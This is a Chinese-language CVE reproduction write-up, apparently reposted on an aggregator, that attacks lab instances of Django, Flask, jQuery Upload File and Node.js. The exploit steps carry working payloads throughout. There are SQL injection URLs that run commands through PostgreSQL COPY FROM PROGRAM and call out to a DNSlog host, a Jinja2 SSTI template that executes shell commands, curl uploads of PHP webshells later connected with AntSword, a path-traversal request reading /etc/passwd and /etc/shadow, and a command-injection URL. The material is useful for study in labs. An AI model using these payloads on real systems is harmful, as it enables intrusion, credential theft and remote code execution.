框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现

这篇具有很好参考价值的文章主要介绍了框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

服务攻防-框架安全&CVE复现&Django&Flask&Node.JS&JQuery漏洞复现

中间件列表介绍

中间件及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等

1、开发框架-PHP-Laravel-Thinkphp

2、开发框架-Javaweb-St2-Spring

3、开发框架-Python-django-Flask

4、开发框架-Javascript-Node.js-JQuery

5、其他框架-Java-Apache Shiro&Apache Sorl

常见语言开发框架

PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend 等

JAVA:Spring MyBatis Hibernate Struts2 Springboot 等

Python:Django Flask Bottle Turbobars Tornado Web2py 等

Javascript:Vue.js Node.js Bootstrap JQuery Angular 等

常见中间件的安全测试:

1、配置不当-解析&弱口令

2、安全机制-特定安全漏洞

3、安全机制-弱口令爆破攻击

4、安全应用-框架特定安全漏洞

中间件安全测试流程:

1、判断中间件信息-名称&版本&三方

2、判断中间件问题-配置不当&公开漏洞

3、判断中间件利用-弱口令&EXP&框架漏洞

应用服务安全测试流程:

1、判断服务开放情况-端口扫描&组合应用等

2、判断服务类型归属-数据库&文件传输&通讯等

3、判断服务利用方式-特定漏洞&未授权&弱口令等

开发框架组件安全测试流程:

1、判断常见语言开发框架类型

2、判断开发框架存在的 CVE 问题

Python开发框架安全-Django&Flask漏洞复现

Django开发框架

介绍:django(Python Web 框架)详解

Django是一个高级的Python Web框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django负责处理网站开发中麻烦的部分,可以专注于编写应用程序,而无需重新开发。它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。

Django 是一款广为流行的开源 web 框架,由 Python 编写,许多网站和 app 都基于
Django 开发。Django 采用了 MTV 的框架模式,即模型 M,视图 V 和模版 T,使用
Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。而且
Django 还包含许多功能强大的第三方插件,使得 Django 具有较强的可扩展性。

安全问题:

CVE_2019_14234

CVE-2021-35042

漏洞复现

CVE-2019-14234(Django JSONField/HStoreField SQL注入漏洞)

该漏洞要求开发者使用 JSONField/HStoreField;此外,还可以控制 QuerySet 的字段名称。Django 的内置应用程序 Django-Admin 受到影响,这为我们提供了一种重现漏洞的简单方法。

靶场:vulhub

参考:Django JSONField/HStoreField SQL注入漏洞复现

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

开启环境:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

首先,使用用户名和密码登录 Django-Admin。

http://your-ip:8000/admin/

账号:admin 密码:a123123123

成功登录:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

然后转到模型的列表视图:

http://your-ip:8000/admin/vuln/collection/

Collection

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

添加到 GET 参数中,其中是 JSONField:

detail__a'b=123 detail

payload:

http://your-ip:8000/admin/vuln/collection/?detail__a%27b=123

可以看到单引号注入成功,SQL语句报错:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

创建 cmd_exec:

payload:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%
20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20

执行效果:

成功创建

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

调用 cmd_exec 执行命令:

DNSlog获取地址

payload:
/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%
20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%20xxxx.dnslog.cn%27--%20

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

DNSlog回显效果:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

CVE-2021-35042(Django QuerySet.order_by SQL注入漏洞)

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

靶场:vulhub

参考:Django QuerySet.order_by SQL注入漏洞复现

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

开启环境:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

首先,转到列表视图并添加到 GET 参数。

payload:

http://your-ip:8000/vuln/order=-id

执行过后会看到按 id 降序排序的数据:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

payload:
目录:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20@@basedir)),1)%23

版本:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20version())),1)%23

数据库名:
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat
(0x7e,(select%20database())),1)%23

可以看到单括号已经注入成功,可以从错误中获取信息。

查看目录:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

爆版本号:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

爆数据库名:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

Flask Jinja2 SSTI

介绍:Flask详解

Flask 是一个使用 Python 编写的轻量级 Web 应用框架。其 WSGI 工具箱采用
Werkzeug ,模板引擎则使用 Jinja2。Flask使用 BSD 授权。

Flask也被称为 “microframework” ,因为它使用简单的核心,用 extension 增加其他功能。Flask没有默认使用的数据库、窗体验证工具。

安全问题:

Flask(Jinja2) 服务端模板注入漏洞

漏洞复现

Flask(Jinja2) 服务端模板注入漏洞

靶场:vulhub

参考:Flask(Jinja2) 服务端模板注入漏洞复现

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

开启环境:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

接下来进行访问,http://your-ip/?name={{123*123}},得到15129这个结果,则说明SSTI漏洞存在。

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

获取eval函数并执行任意python代码的POC:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

ps:需要进行url编码,编码过后直接通过GET请求,发送即可。

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

执行命令处,自定义像要执行的命令,查看的信息,每次更换命令都需要进行URL编码重新发送。

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

其他命令:ls,whoami

执行效果:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

JavaScript开发框架安全-Jquery&Node漏洞复现

jQuery框架

介绍:jQuery详解

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less,Do More”,即倡导写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。

安全问题:

CVE_2018_9207

CVE_2018_9208

CVE_2018_9209

漏洞复现

CVE_2018_9207-jQuery Upload File漏洞复现

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery-upload-file

靶场:vulfocus

开启靶场:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问框架引用目录结构:

/jquery-upload-file/

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

利用:

一条命令即可解决,访问并上传文件。

payload:
//访问网站,进行上传;前提是在文件夹下创建后门文件。
curl -F "myfile=@shell.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

curl -F "myfile=@cmd.php" "http://192.168.100.134:37180/jquery-upload-file/php/upload.php"

上传shell.php:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

上传cmd.php:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

查看:

上传文件所在位置:(后门为php)

/jquery-upload-file/php/uploads/

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

验证,可否解析执行:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

使用蚁剑连接:

连接成功

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

其他列出的安全问题,基本都差不多。

Node.js

详解:node.js详解

Node.js 是一个基于 Chrome V8 引擎的 JavaScript 运行环境,用于方便的搭建响应
速度快、易于拓展的网络应用。

Node.js对一些特殊用例进行优化,提供替代的API,使得V8在非浏览器环境下运行得更好,V8引擎执行Javascript的速度非常快,性能非常好,基于Chrome JavaScript运行时建立的平台, 用于方便地搭建响应速度快、易于扩展的网络应用

安全问题:

CVE_2021_21315

CVE_2017_14849

漏洞复现

Node.js 目录穿越漏洞(CVE-2017-14849)

Joyent Node.js是美国Joyent公司的一套建立在Google V8 JavaScript引擎之上的网络应用平台。该平台主要用于构建高度可伸缩的应用程序,以及编写能够处理数万条且同时连接到一个物理机的连接代码。 Joyent Node.js 8.6.0之前的8.5.0版本中存在安全漏洞。远程攻击者可利用该漏洞访问敏感文件。

漏洞原因是 Node.js 8.5.0 对目录进行normalize操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd),在中间位置增加foo/../(如../../../foo/../../../../etc/passwd),即可使normalize返回/etc/passwd,但实际上正确结果应该是../../../../../../etc/passwd

express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize函数,上述BUG导致normalize函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。

靶场:vulfocus

参考:CVE-2017-14849复现

开启环境:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

其中引用到了文件/static/main.js,说明其存在静态文件服务器。

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

构造请求:

通过GET请求发送以下数据包即可:
GET:
...
/static/../../../a/../../../../etc/passwd
...

完整数据包:

GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: 192.168.100.134:56111
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

发送给重发器,然后再发送数据包过后:

(如果打开web界面抓包时,构造请求后,发包无法正常回显,状态码报错。可尝试删除cookie等相关信息,不然可能会无法正常回显,错误状态码。如果正常回显,就可以不用删除。)

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

效果:成功读取/etc/passwd文件

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

效果:成功读取/etc/shadow文件

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

Node.js 命令执行 (CVE-2021-21315)

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。

靶场:vulfocus

开启环境:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

访问web界面:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

构造GET请求:

payload:
/api/getServices?name[]=$(echo%20%27rumilc666%27%20>%20rumi.txt)

执行过后:

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery

验证:

成功生成该文件

docker ps
docker exec -it id /bin/bash

框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现,Web安全,漏洞复现,django,flask,网络安全,web安全,安全,node.js,jquery文章来源地址https://www.toymoban.com/news/detail-715698.html

到了这里,关于框架安全-CVE 漏洞复现&Django&Flask&Node.js&JQuery框架漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Django系列所有漏洞复现vulhubCVE-2018-14574,CVE-2022-34265,CVE-2021-35042

    Django默认配置下,如果匹配上的URL路由中最后一位是/,而用户访问的时候没加/,Django默认会跳转到带/的请求中。(由配置项中的django.middleware.common.CommonMiddleware、APPEND_SLASH来决定)。 在path开头为//example.com的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最

    2024年02月07日
    浏览(29)
  • 【漏洞复现】Django_debug page_XSS漏洞(CVE-2017-12794)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-12794 漏洞名称 Django_debug page_XSS漏洞 漏洞评级 影响范围 1.11.5版本 漏洞描述 修复方案 1.1、漏洞描述 1.11.5版本,修复了500页面中存在的一个XSS漏洞 1.2、漏洞等级 1.3、影响版本

    2024年02月05日
    浏览(27)
  • 框架漏洞-CVE复现-Apache Shiro+Apache Solr

    什么是框架?        就是别人写好包装起来的一套工具,把你原先必须要写的,必须要做的一些复杂的东西都写好了放在那里,你只要调用他的方法,就可以实现一些本来要费好大劲的功能。          如果网站的功能是采用框架开发的,那么挖掘功能的漏洞就相当于

    2024年02月16日
    浏览(22)
  • 【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的

    2024年02月08日
    浏览(37)
  • 【网络安全】CVE漏洞分析以及复现

    漏洞详情 Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。 漏洞影响版本 Shiro 1.0.0-incubating 对应 Maven Repo 里面也有 【一一帮助安全学习,所有资源获取一一】 ①网络安全学习路线 ②20份渗透测试电子书 ③安全

    2024年02月06日
    浏览(34)
  • 中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试: 1、配置

    2024年02月08日
    浏览(25)
  • Apache Tomcat 安全漏洞(CVE-2020-13935)复现

    漏洞详情: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,该漏洞源于程序没有正确验证payload的长度。攻击者可利用该漏洞造成拒绝服务(无限循环)。 影响版

    2024年02月11日
    浏览(36)
  • 中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-IIS-短文件解析蓝屏等 2、中间件-Nginx-文件解析命令执行等 3、中间件-Apache-RCE目录遍历文件解析等 4、中间件

    2024年02月07日
    浏览(35)
  • 服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

    目录 一、导图 二、ISS漏洞 中间件介绍 1、短文件 2、文件解析 3、HTTP.SYS 4、cve-2017-7269 三、Nignx漏洞 中间件介绍 1、后缀解析漏洞 2、cve-2013-4547 3、cve-2021-23017 无 EXP 4、cve-2017-7529 意义不大 四、Apache漏洞 中间件介绍 1、漏洞版本简介 2、cve-2021-42013 3、cve-2021-41773 4、cve-2017-1571

    2024年02月10日
    浏览(48)
  • 中间件安全-CVE 复现&K8s&Docker&Jetty&Websphere漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。 中间件所披露的问题: 中间件安全-IISApacheTomcatNginx漏洞复现 中间件安全-WeblogicJenkinsGlassFish漏洞复现 1、中间

    2024年02月08日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包